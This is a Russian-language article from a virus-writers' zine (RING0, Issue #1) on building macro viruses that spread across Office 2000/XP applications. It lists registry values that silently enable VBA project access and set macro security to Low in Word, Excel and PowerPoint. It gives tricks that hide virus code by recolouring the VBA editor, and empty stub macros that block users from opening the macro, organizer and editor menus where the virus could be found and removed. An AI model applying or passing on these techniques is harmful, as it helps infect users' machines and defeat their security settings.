/*-----------------------------------------------------------------------*/
 /*                       R I N G 0,    I S S U E   # 1                   */
 /*-----------------------------------------------------------------------*/

                     О макро вирусах в Office 2000/XP

                                                          by VOVAN // SMF

  В  последнее  время фирма мелкомягких занялась борьбой с макро вирусами
 это  заметно  и  на  продукте  Office  2000/XP  ихние цифровые подписи и
 сертификаты не дают спокойно размножаться макро вирусам.

  Как известно больше всего они хотели защитить Office 2000 Для этого они
 сделали  три  степени  защиты. Высокая, при которой все, не подписанные,
 макросы  отключаются без запроса Средняя, при которой на экран выводится
 сообщение  о  присутствии  макросов  в  доке Низкая, при которой макросы
 выполняются  без запроса По умолчанию в Worde 2000 стоит Высокая степень
 защиты.

  Такие  же  дела  обстоят  и в Excel 2000, но более благоприятные, чем в
 Worde 2000 По умолчанию там стоит Средняя степень защиты, что даёт шанс.
 Тоже самое и в PowerPointe 2000

  Делаем выводы, нужно делать кросс платформенные вирусы, дабы проникнуть
 во все приложения мелкомягких, в том числе и в Word 2000.


                                                VBS<-->HTML
Схема проникновения в Office 200                    \/
                                          Excel===>Word<===PowerPoint


В Office XP для всех приложений стоит высокий уровень защиты!


Схема проникновения в Office XP              VBS<-->HTML
                                                 \/
                                                 |
                                                /|\
                                              /  |  \
                                            /    |    \
                                        Excel=>Word<=PowerPoint


  Но  эти  мелкомягкие  позаботились даже от проникновения из вне дабы не
 дать,  к примеру, VBS вирусу проникнуть в Word или Excel т.д. А дело вот
 в  чем в Worde XP, как и в других приложениях появилась некая функция ее
 можно  увидеть,  зайдя  в  меню  "Сервис"->"Макрос"->"Безопасность..."->
 "Надежные  источники" то в низу меню можно заметить два пункта на первом
 стоит  галочка  по  умолчанию, а вот на втором "Доверять доступ к Visual
 Basic  Project"  который как раз нам и нужен, позарез галочки нет, а без
 нее  в Office XP кросс платформенный вирус ничего ни сделает при попытки
 проникнуть в шаблон из другого приложения появится такое вот критическое
 окошко с надписью

 "Отсутствует доверие к программируемому доступу к проекту Visual Basic."

  Эту  проблему  можно решить очень простым способом установить доверие к
 доступу Visual Basic через реестр.

  Вот команды для Word XP

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\Security]
"AccessVBOM"=dword:00000001

  А  также  установить  низкую  защиту  от макро вирусов, при которой они
 будут выполнять без запроса.

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\Security]
"Level"=dword:00000001

  для Word 2000

Установить Низкий уровень безопасности
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001

  для Excel XP

Разрешить доступ к Visual Basic
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Excel\Security]
"AccessVBOM"=dword:00000001

Установить Низкий уровень безопасности
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Excel\Security]
"Level"=dword:00000001

  для Excel 2000

Установить Низкий уровень безопасности
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Excel\Security]
"Level"=dword:00000001

  для PowerPoint XP

Разрешить доступ к Visual Basic
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\PowerPoint\Security]
"AccessVBOM"=dword:00000001

Установить Низкий уровень безопасности
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\PowerPoint\Security]
"Level"=dword:00000001

  для PowerPoint 2000

Установить Низкий уровень безопасности
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\PowerPoint\Security]
"Level"=dword:00000001

  Также  можно применить стелс прием для сокрытия кода в редакторе Visual
 Basic  Суть  его  работы  заключается в том, чтобы сделать все символы в
 редакторе  Visual  Basic  белыми под цвет фона это можно легко сделать с
 помощью параметров в реестре.

                              Office 2000/XP
                              ~~~~~~~~~~~~~~
[HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common]
"CodeBackColors"="1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"

[HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common]
"CodeForeColors"="1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"

  Следующий параметр нужен удаления разделяющей полосы между макросами

[HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common]
"EndProcLine"=dword:00000000


  Также в Office 2000/XP появились новые стелс макросы

Sub ViewSecurity()
End Sub

  Этот       макрос       срабатывает      при      активизации      меню
 "Сервис"->"Макрос"->"Безопасность..."

Sub ToolsOptionsSecutity()
End Sub

  Этот  макрос  срабатывает  при активизации окна Безопасность, где можно
 установить уровень безопасности для активного документа.

  Уже известные стелс макросы

Sub ToolsOptions()
End Sub
  Не  дает  зайти  в  меню  "Сервис"->"Параметры..." где можно установить
 запрос   на   сохранение   шаблона  Normal.dot,  что  может  существенно
 затруднить работу вируса а также менять каталоги автозагрузки шаблонов.

Sub Organizer()
End Sub
  Не  дает зайти в Организатор, где можно увидеть модули вируса и удалять
 их переименовывать и копировать.

Sub ToolsCustomize()
End Sub
  Не  дает  зайти  в меню "Сервис"->"Настройка..." где можно восстановить
 скрытые панели инструментов, а также увидеть макросы в модулях.

Sub ToolsRecordMacroToggle()
End Sub
  Не дает создать, и записывать макрос.

Sub ToolsRecordMacroStart()
End Sub
  Не дает записывать макрос.

Sub FileTemplates()
End Sub
  Не  дает  зайти  в  меню  "Сервис"->"Шаблоны и надстройки..." где можно
 подключить  свой  собственный шаблон или отключить дополнительный шаблон
 созданный вирусом.

Sub ToolsMacro()
End Sub
  Не  дает  зайти  в меню "Макрос"->"Макросы" где можно увидеть макросы и
 модули, а также запустить, удалить, редактировать и вызвать Организатор.

Sub ViewVBcode()
End Sub
  Не  дает  загрузить  Редактор  Visual Basic, где можно увидеть модули и
 макросы, а также их изменить и удалить.


  Вот  и  все  не забывайте получить доверие к доступу Visual Basic через
 реестр!